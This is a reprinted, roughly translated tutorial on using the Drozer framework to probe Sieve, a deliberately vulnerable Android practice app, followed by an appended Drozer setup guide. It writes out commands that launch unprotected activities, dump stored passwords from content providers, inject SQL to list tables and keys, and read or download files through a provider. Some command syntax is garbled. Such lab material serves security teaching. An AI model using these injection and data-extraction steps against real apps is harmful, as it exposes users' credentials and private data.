Use Drozer to evaluate the app (reprint)

Test examples for security evaluation of Android applications using Drozer

Looking at Drozer user documentation, tried several Android apps, the test found that the few apps are basically no problem, had to use the drozer provided by the sieve to practice. The steps to perform the installation evaluation are generally the following heading steps.

1 Installing on an Android device using sieve

Sieve is a password manager app that shows some common flaws in Android apps that you can use to practice drozer. https://www.mwrinfosecurity.com/system/assets/380/original/sieve.apk download sieve.apk. Open the emulator, install Sieve: adb intsall sieve apk Then set up sieve, first use the password and pin that you need to set the Sieve software to open. Add content to the sieve, adding some account password information to manage

There are other features in the seting:

2 Get App Package info

Drozer the function of each module:

The module that gets the app package information is **app.package.* * *:

2.1 Get the package name of all installed apps on Android device

The command is:

Run App.package.info-a Com.mwr.example.sieve

Run App.package.list

This command will list all the apps, if you want to find a specific app to add the- f [app keyword] parameters, such as Find sieve on Android device package name:

Run App.package.list-f Sieve

Note: When you enter a command, you can use the Tab key to automatically fill in the name of the package that you want to remember Com.mwr.example.sieve.

2.2 Get some basic information on sieve

The command is:

Run App.package.info-a Com.mwr.example.sieve

You can see the version information of the sieve, the directory where the data is stored, the user ID, the group ID, whether there is a shared library, and the permissions information.

2.3Itentify the Attack surface (identify attack surface?) )

This test tutorial focuses on the vulnerability of Android's inherent IPC communication mechanism, which causes the app to leak sensitive information to other apps on the same device. To find the commands that can make attack surface components:

Run App.package.attacksurface Com.mwr.example.sieve

The results show the number of potentially available components: "Exported" means that the component can be used by other apps. Services is debuggable that we can bind a debugger to a process with ADB.

2.4 Get further information on attack surface

The command to further obtain ativity-formed attack surface information is:

Run App.activity.info-a Com.mwr.example.sieve

The mainloginactivity is the main interface when the program starts, it must be exported, and the other two activity is theoretically not exported.

2.5 Start activities

Pwlist and fileselectactivity are exported and do not need any permissions, we can start them with drozer, such as feeling pwlist this gold should be larger, so start it, the command is:

Run App.activity.start–component Com.mwr.example.sieve com.mwr.example.sieve.PWList

The effect after startup:

How to use App.activity.start:

Help App.activity.start Usage:run App.activity.start [-h] [–action action] [–category category [Category ...]] [–component Package Component] [–data-uri Data_uri] [–extra TYPE KEY VALUE] [–flags flags [flags ...]] [–mimetype MimeType]

Starts an Activity using the formulated intent.

2.6 Getting information from content provider

Next to section 2.3, the commands for further information on the content provider's attact surface are:

Run App.provider.info-a Com.mwr.example.sieve

You can see the details of the two exported content provider in section 2.3, including names, permissions, access paths, and so on.

2.6.1 find URIs that can access content provider (data leaks)

From the previous section we guessed that Dbcontentprovider would have a database in some format, but we don't know how the data is organized. The content URI must be in the form of "content:///", so we can construct a partial content URIs to access the Dbcontent Provider. There is a path to "/keys" that requires Read_keys and Write_keys permissions to read and write.

Drozer's scanner module provides some ways to guess which content URIs might exist:

Run Scanner.provider.finduris-a Com.mwr.example.sieve

has detected a URI that can access content, we can then use other modules and URIs from Drozer to get and even change information from the content. Such as:

Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–vertical

If we get the username, the mailbox account number, and the BASE64 encoded password string.

2.6.2 for SQL injection

The Android operating system recommends using the SQLite database to store user data. The SQLite database uses SQL statements, so SQL injection is possible. using the projection parameter and the Seleciton parameter, you can pass some simple SQL injection statements to the content provider. Such as:

Run app.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–projection "'"

Run app.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–selection "'"

The Android device returned a very detailed error message after the above two commands were executed.

Use SQL injection to list all data tables in the database:

Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–projection "* from Sqlite_ MASTER WHERE type= ' table '; – "

use SQL injection to list the contents of a data table :

Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/–projection "* FROM key;–"

2.6.3 getting information from file system-backed Content providers

File system-backed content provider provides a way to access the underlying file system, and the Android sandbox prevents the app from sharing files, while file system-backed content Provider allows apps to share files. For sieve, we can infer that Filebackupprovider is a file system-backed content provider. We can use Drozer's app.provider.read module to view a file :

Run App.provider.read content://com.mwr.example.sieve.filebackupprovider/etc/hosts

You can download files using App.provider.download

Run App.provider.download content://com.mwr.example.sieve.filebackupprovider/data/data/com.mwr.example.sieve/ Databases/database.db/home/user/database.db

2.6.4 checking the vulnerability of content provider

Check if there is SQL injection:

Run Scanner.provider.injection-a Com.mwr.example.sieve

Check for the existence of a vulnerability traversing a file

Run Scanner.provider.traversal-a Com.mwr.example.sieve

Summary Experience : I think in the beginning to get the basic information of the package, we first use the module scanner inside the tools to sweep, find some loopholes or use points after the next step.

2.7 Interacting with services

Gets the command for a services that is a exported state:

Run App.service.info-a Com.mwr.example.sieve

About the Services Module:

If you send a message to a service:

Run App.service.send com.mwr.example.sieve com.mwr.example.sieve.cryptoservice–msg 1 5 3

Results returned:

Don't understand why this is returned, the number of segments is not enough.

2.8 Other common modules

• Shell.start open an interactive Linux Shell on an Android device
• Tools.file.upload/tools.file.download
• TOOLS.SETUP.BUSYBOX/TOOLS.SETUP.MINIMALSU installing BusyBox or MINIMALSU on Android devices

Ubuntu14.04 installation and use of Drozer tools July 22, 2014/No CommentsIntroduction to the installation and use of Ubuntu14.04 Drozer tools 1.Drozer Tools

Slightly

2. Installation of tools 2.1 installation Prerequisites

Make sure that the PC's operating system is installed with:

• JRE or JDK
• Android SDK

The 64-bit Ubuntu14.04 needs to be installed ia32-libs. Make sure that ADB and Java are already in the system environment variable path.

2.2Ubuntu Mounting Drozer

Can be downloaded from the official website https://www.mwrinfosecurity.com/products/drozer/community-edition/. Deb installation package directly installed; You can also download the. Egg Python package installation, which requires you to manually download and install the PROTOBUF and twisted packages yourself. I am a direct download of the. deb package installed.

2.3 Mobile phone or simulator Installation Agent agent.apk

To download agent.apk, use the command to install:

ADB install agent.apk

3 Drozer Use 3.1 establish Drozer console and Dorzer Agent connection, open a session

STEP1 Establish port forwarding, Drozer uses port 31415 by default. The following command: Forwards all data from Ubuntu TCP port 31415 to the 31415 port on the phone:

ADB forward tcp:31415 tcp:31415

STEP2 Open the agent server on your Android device. Select the "enbeded Server" option, and then select "Enadble" to turn on agent server.

Step3 Use Drozer console to connect to the agent server. Enter the command in the Ubuntu Terminal:

Drozer Console Connect

Open the effect as follows:

Command for 3.2Drozer console

The Drozer console is a command-line environment similar to the bash shell. The Drozer console provides a range of modules for evaluating the security of Android devices, each with a clear function. It is the command description that you translate according to the official document, which may not be accurate:

Command	Description	Notes
Run MODULE	Run a Drozer module
List or LS	Displays all Drozer modules that can be executed in the current session	Hide modules that you do not have permission to execute
Shell	Open an interactive Linux shell in the context of the agent process on the device
Cd	Jump command, mount to the specified module space	You can avoid repeating the full name of the input module
Clean	Clear the temporary files Drozer saved on your Android device
Contributors	List names that contribute to the Drozer framework
Echo	displaying text in the console
Exit	End Drozer Session
About	Help for displaying a command or module (about)
Load	Loads and sequentially runs a file containing a series of DROZER commands
Module	Find and install Drozer extension modules from the Internet
Permissions	Displays the permissions that the Drozer agent obtains
Set	An assignment operation that saves a value to a variable that can be used as an environment variable	such as: Set host=193.168.1.1
unset	Cancel Assignment	......

Use the list to display all the modules first, then use the CD command to enter the scanner module, then using the set, echo, unset command

is the Official Document command description:

Use Drozer to evaluate the app (reprint)